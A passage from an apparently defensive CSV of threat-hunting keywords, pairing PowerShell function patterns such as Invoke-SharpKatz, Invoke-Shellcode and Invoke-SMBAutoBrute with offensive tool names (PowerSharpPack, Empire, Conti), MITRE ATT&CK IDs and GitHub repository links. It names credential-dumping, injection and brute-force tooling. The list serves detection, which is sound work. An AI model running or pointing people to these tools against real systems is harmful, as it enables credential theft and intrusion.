testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Invoke-SharpAllowedToAct*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-SharpBlock*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-SharpBypassUAC*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-SharpChromium*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-SharpClipboard*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-SharpCloud*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-SharpCloud*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*Invoke-Sharpcradle*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*Invoke-SharpDPAPI*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-SharpDump*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-SharPersist*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-SharpGPO*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*Invoke-SharpGPOAbuse*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-SharpGPO-RemoteAccessPolicies*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-SharpHandler*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-SharpHide*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*InvokeSharpHound*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","1","N/A","N/A","5","440","125","2023-10-04T21:38:29Z","2021-07-12T17:07:04Z" +"*Invoke-Sharphound*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*Invoke-Sharphound2*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-Sharphound3*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-SharpHound4*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-Sharphound4*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*Invoke-SharpImpersonation*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-SharpImpersonation*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*Invoke-SharpImpersonationNoSpace*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-SharpKatz*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-SharpLdapRelayScan*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-SharpLdapRelayScan*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*Invoke-Sharplocker*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-SharpLoginPrompt*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-SharpMove*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-SharpPrinter*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-SharpPrinter*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*Invoke-SharpPrintNightmare*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-SharpRDP*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-SharpRDP.ps1*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" +"*Invoke-SharpSCCM*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-SharpSCCM*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*Invoke-SharpSecDump*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-Sharpshares*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-SharpSniper*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-SharpSploit*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-Sharpsploit_nomimi*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-SharpSpray*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-SharpSSDP*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-SharpStay*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-SharpUp*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-SharpUp*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*Invoke-Sharpview*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-SharpWatson*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-Sharpweb*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-Sharpweb*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*Invoke-SharpWeb.ps1*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" +"*Invoke-SharpWSUS*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-Shellcode -Shellcode*","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","N/A","C2","https://github.com/Arno0x/DBC2","1","0","N/A","10","10","269","85","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z" +"*Invoke-Shellcode*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Invoke-Shellcode*","offensive_tool_keyword","sRDI","Shellcode Reflective DLL Injection - Shellcode implementation of Reflective DLL Injection. Convert DLLs to position independent shellcode","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/monoxgas/sRDI","1","1","N/A","N/A","10","1855","445","2022-12-14T16:01:43Z","2017-07-28T19:30:53Z" +"*Invoke-Shellcode*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" +"*Invoke-Shellcode.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1139","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-Shellcode.ps1*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","1","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Invoke-ShellcodeMSIL*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1074","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-ShellCommand*","offensive_tool_keyword","empire","empire function name of agent.ps1.Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1053","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-SlinkyCat*","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/LaresLLC/SlinkyCat","1","1","N/A","N/A","1","70","3","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" +"*Invoke-SMBAutoBrute*","offensive_tool_keyword","conti","Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040","Conti Ransomware","Wizard Spider","Ransomware","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*Invoke-SMBAutoBrute*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - 